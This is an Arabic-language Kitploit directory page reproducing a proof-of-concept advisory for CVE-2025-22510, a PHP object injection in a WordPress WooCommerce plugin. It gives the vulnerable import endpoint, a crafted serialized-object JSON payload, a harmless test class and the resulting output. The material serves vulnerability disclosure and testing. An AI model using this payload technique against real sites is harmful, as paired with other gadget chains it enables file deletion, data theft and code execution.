Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-22510 — إثبات المفهوم لـ CVE-2025-22510 | Kitploit
أدوات/GitHubGitHub/dottak/cve-2025-22510
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubdottak/cve-2025-22510

CVE-2025-22510

إثبات المفهوم لـ CVE-2025-22510

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-22510

1️⃣ نوع المكوّن

إضافة ووردبريس

2️⃣ تفاصيل المكوّن

اسم المكوّن WC Price History for Omnibus

الإصدار المعرّض <= 2.1.4

Slug المكوّن wc-price-history

رابط المكوّن https://wordpress.org/plugins/wc-price-history/

3️⃣ OWASP 2017: TOP 10

فئة الثغرة A3: Injection

نوع الثغرة PHP Object Injection

4️⃣ الشرط المسبق

مدير المتجر (Administrator أو أعلى)

5️⃣ تفاصيل الثغرة

👉 وصف مختصر

في إضافة WC Price History for Omnibus الإصدار 2.1.4 وما دونه، يمكن رفع ملفات JSON من خلال قسم 'استيراد بيانات التصحيح' في قائمة 'سجل الأسعار' في لوحة تحكم WooCommerce (/wp-admin/admin.php?page=wc-price-history). يُرسَل ملف JSON المرفوع كحمولة wc_price_history_import_file، وتحدث ثغرة حقن كائنات PHP في قيمة المفتاح 'serialized' من بيانات JSON. من خلال هذه الثغرة، يمكن لمهاجم يملك صلاحيات مدير المتجر حقن كائنات PHP.

على الرغم من أن الإضافة نفسها لا تحتوي على أي سلاسل POP معروفة، إلا أنه إذا تم اكتشاف سلاسل POP في إضافات أو قوالب أخرى على موقع WordPress المستهدف، يمكن للمهاجمين تنفيذ حذف ملفات عشوائية، وسرقة معلومات حساسة، وتنفيذ كود.

👉 طريقة إعادة الإنتاج (PoC)

  1. جهّز موقع WordPress مثبّتًا عليه إضافة WC Price History for Omnibus الإصدار 2.1.4 أو أقل ومفعّلًا.

    لتفعيل هذه الإضافة، يجب أولاً تثبيت وتفعيل إضافة WooCommerce.

  2. لاختبار ثغرة حقن كائنات PHP، أضف الكلاس التالي PoC_POP_Chain_Object إلى أسفل ملف wp-config.php.

    root@kitploit:~
    class PoC_POP_Chain_Object {
    	
    	public $message = "";
    
    	public function __destruct() {
    		echo "<mark>Success PoP Chain</mark>";
    		echo "<br>";
    		echo "<mark>msg: ". $this->message ."</mark>";
    	}
    }
    

    image

  3. بعد ذلك، أنشئ ملفًا يحتوي على بيانات JSON التالية.

    في بيانات JSON هذه، البيانات المُدخلة في المفتاح serialized تكون بصيغة كائن PHP مُسلسَل، مما ينشئ نسخة من الكلاس PoC_POP_Chain_Object الذي أُضيف سابقًا إلى ملف wp-config.php ويُسند السلسلة 'Exploit !!' إلى خاصية message.

    root@kitploit:~
    {
        "serialized": "O:20:\"PoC_POP_Chain_Object\":1:{s:7:\"message\";s:10:\"Exploit !!\";}"
    }
    

👉 معلومات إضافية (اختياري)

[سبب الثغرة]

عند رفع بيانات JSON عبر قسم 'استيراد بيانات التصحيح' في قائمة 'سجل الأسعار' بلوحة تحكم WooCommerce (/wp-admin/admin.php?page=wc-price-history) والنقر على زر 'استيراد'،

يتم تنفيذ الدالة import_file() المعرَّفة في الكلاس Import داخل الملف /wp-content/plugins/wc-price-history/app/PriorPrice/Import.php. تسترجع هذه الدالة حمولة الطلب wc_price_history_import_file التي تحتوي على ملف JSON، ثم تسترجع البيانات ذات المفتاح serialized من بيانات JSON وتقوم بإلغاء التسلسل عبر الدالة maybe_unserialize.

image

لذلك، فإن حمولة الطلب wc_price_history_import_file تكون بصيغة JSON، وتحدث ثغرة حقن كائنات PHP أثناء عملية إلغاء تسلسل البيانات المُسلسَلة ذات المفتاح serialized دون أي تحقق.

6️⃣ العرض التوضيحي للاستغلال

video

7️⃣ المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2025-22510
تنزيل الأداة
  • بعد ذلك، انتقل إلى قائمة 'سجل الأسعار' (/wp-admin/admin.php?page=wc-price-history) في لوحة تحكم WooCommerce. في قسم 'استيراد بيانات التصحيح'، اختر ملف JSON الذي أنشأته سابقًا عبر نموذج رفع الملفات، وانقر على زر 'استيراد' لرفعه.

    image

  • نتيجةً لطلب الرفع، يمكنك رؤية في بيانات الاستجابة أن الطريقة السحرية __destruct() من الكلاس PoC_POP_Chain_Object المضاف إلى wp-config.php قد نُفِّذت، وعرضت الرسالة التالية.

    root@kitploit:~
    <mark>Success PoP Chain</mark>
    <br>
    <mark>msg: Exploit !!</mark>
    

    image